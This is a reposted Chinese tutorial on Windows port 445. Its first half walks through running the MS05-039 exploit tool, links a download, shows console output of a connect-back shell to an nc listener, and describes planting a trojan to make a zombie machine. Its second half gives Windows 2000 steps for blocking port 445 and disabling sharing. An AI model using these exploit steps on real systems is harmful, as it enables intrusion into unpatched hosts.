转载自:http://www.shangxueba.com/jingyan/390114.html
相关工具
ms05039:
http://down.51cto.com/data/612193
C:\445>ms05039.exe192.168.0.13192.168.0.1112341
MS05-039WindowsPnPRemoteOverflowExploit
ConnectbackshellcodeEditionBysuperlone[EST]
TestedOnWindows2000PROSP4CN
[+]Tryingtoconnecttoremoteporton192.168.0.13:445...ESTABLISHED
[+]Makingnullsession...OK
[+]Tryingtobindpipe...OK
Tringtosendcraftedpacket...OK
[+]Exploitdone!Checkyourreverseshellon192.168.0.11:1234
C:\445>nc.exe-vv-l-p1234
listeningon[any]1234...
教会你445端口的***与防范:
445端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了它,***们才有了可乘之机,他们能通过该端口偷偷共享你的硬盘,甚至会在悄无声息中将你的硬盘格式化掉!我们所能做的就是想办法不让***有机可乘,封堵住445端口漏洞。简单起见,本文中都以Windows2000为例,对于WindowsXP,步骤基本类似。
第一步,我们需要做的是确定一台存在445端口漏洞的主机。可以用扫描工具扫描得到!比如SUPERSCAN这个端口扫描工具。
第二步,假设现在我们已经得到一台存在445端口漏洞的主机,那么我们就可以利用瑞士***nc和溢出工具ms05039进行***:
F:\445>ms05039目标IP本地IP1234
。。。。。。
。。。。。。
F:\445>nc.exe-vv-l-p1234
。。。。。。
。。。。。。
成功的话,就会返回一个shell,然后就可以用我们常用的命令了。比如让他去下载我们的***或上传一个***给他,然后运行,这样得到一只肉鸡了。
看了上面的这些,是不是觉得自己的电脑很危险?不用怕,下面我们就来解除这危险的445端口漏洞:
防范445端口漏洞的***方法:
1.端口排除法
这种方法利用了Windows2000系统的端口排除功能将来自于445端口的所有信息包全部禁止掉,让大
恶人们无法接近你的主机,下面是这种方法的具体实现步骤:
打开Windows2000系统的开始菜单,选中设置项下面的网络和拨号连接图标,并用鼠标右键单击之,从其后的快捷菜单中,单击浏览命令;
在接着出现的窗口中,右击Internet连接图标,选中属性选项,弹出Internet连接属性窗口;
打开常规标签页面,将其中的Internet协议(TCP/IP)项选中,然后再单击一下属性按钮,打开Internet协议(TCP/IP)属性设置页面;
继续单击该页面中的高级按钮,打开高级TCP/IP设置窗口,选中其中的选项标签,并在该标签页面的可选的设置项中,将TCP/IP筛选选中,再单击一下对应的属性按钮,打开TCP/IP筛选的设置口;
由于445端口属于一种TCP端口,你可以在对应TCP端口的设置项处,将只允许项选中,激活下面的添加按钮,单击该按钮,在其后打开的添加筛选器窗口中,将必须用到的几个服务端口号码,都添加进来,而将用不到的445端口号码排除在外,设置完毕后,单击确定按钮,就可以让设置生效了。
2.服务关闭法
考虑到文件夹或打印机共享服务才会利用到445端口,因此直接将文件夹或打印机共享服务停止掉,同样也能实现关闭445端口的目的,让***无法破坏各种共享资源,下面是关闭文件夹或打印机共享服务的具体步骤:
打开Windows2000系统的开始菜单,选中设置项下面的网络和拨号连接图标,并用鼠标右键单击之,从其后的快捷菜单中,单击浏览命令;
在接着出现的窗口中,右击Internet连接图标,选中属性选项,弹出Internet连接属性窗口;
打开常规标签页面,并在此连接使用下列选定的组件列表框中,将Microsoft网络的文件或打印机共享选项前面的勾号取消,如图2所示。最后单击确定按钮,重新启动系统,Internet上的大恶人们就没有权利访问到各种共享资源了。
当然,你也可以在不停止共享服务的条件下,剥夺大恶人们的共享访问权利;利用本地安全设置中的用户权利指派功能,指定Internet上的任何用户都无权访问本地主机,具体步骤为:
在Windows2000系统的开始菜单中,依次单击程序 管理工具 本地安全设置选项,接着展开安全设置 本地策略 用户权利指派文件夹,在对应的右边子窗口中选中拒绝从网络访问这台计算机选项,并用鼠标左键双击之;
打开设置窗口后,单击添加按钮,从弹出的选择用户或组对话框中选中everyone选项,再单击添加按钮,最后单击确定,这样任何一位用户都无法从网络访问到本地主机。